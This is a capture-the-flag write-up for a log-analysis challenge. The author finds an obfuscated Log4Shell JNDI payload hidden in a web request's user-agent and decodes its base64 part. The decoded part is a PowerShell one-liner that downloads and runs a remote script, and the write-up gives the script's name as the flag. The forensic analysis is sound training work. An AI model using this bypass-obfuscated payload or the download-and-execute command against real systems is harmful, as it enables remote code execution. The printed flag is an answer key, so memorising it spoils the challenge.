Statement: We implemented a basic IPS to help protect our site from new attacks.
Somehow, a newer more sophisticated version of a regularly observed attack was successfully executed against the website.
What is the name of the script that was run?
Flag format: Name of the script that was run, case sensitive.
The challenge provides a JSON file containing logs.
These logs and scenarios are designed to be real-ish, they’re simpler and given that the entire data set covers 1hr all malicious activity is conducted on a condensed time frame.
Searching in the logs, I notice that a log4j exploit has been performed:
{
"_time": "2021-01-01T09:29:13.000+0000",
"origin": "119.17.132.75",
"site": "shop.downunderctf.com",
"method": "GET",
"referer": "shop.downunderctf.com/register",
"useragent": "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://41.108.181.141:5552/Basic/Command/Base64/cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=}",
"url": "shop.downunderctf.com/Login",
"logSource": "Http:Web"
}
The payload is base64 encoded, so I will decode it to read the content and get the name of the script:
echo "cG93ZXJzaGVsbC5leGUgLWV4ZWMgYnlwYXNzIC1DICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHBzOi8vZG93bnVuZGVyY3RmLmNvbS9wVENOcDVwNkxQMGQ3cUE3N3l2YjRTSGY0MCcpOyI=" | base64 -d
Payload value:
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://downunderctf.com/pTCNp5p6LP0d7qA77yvb4SHf40');"
Flag: pTCNp5p6LP0d7qA77yvb4SHf40